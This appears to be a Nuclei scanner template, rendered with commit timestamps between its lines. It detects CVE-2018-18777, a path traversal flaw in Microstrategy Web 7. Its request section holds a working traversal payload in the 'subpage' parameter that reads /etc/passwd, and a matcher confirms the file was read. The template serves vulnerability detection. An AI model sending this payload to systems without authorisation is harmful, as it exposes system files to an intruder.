2021-06-20 10:26:27 +00:00
id : CVE-2018-18777
info :
2022-07-26 13:45:11 +00:00
name : Microstrategy Web 7 - Local File Inclusion
2021-06-20 10:26:27 +00:00
author : 0x_Akoko
2021-09-10 11:26:40 +00:00
severity : medium
2021-08-29 06:42:18 +00:00
description : |
2022-07-26 13:45:11 +00:00
Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest security patches or upgrade to a newer version of Microstrategy Web.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/45755
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-18777
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 4.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-18777
cwe-id : CWE-22
2023-10-14 11:27:55 +00:00
epss-score : 0.00224
epss-percentile : 0.60404
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : microstrategy
product : microstrategy_web
tags : traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi
2021-06-20 10:26:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-20 10:26:27 +00:00
- method : GET
path :
- "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-06-20 10:26:27 +00:00
- type : status
status :
- 200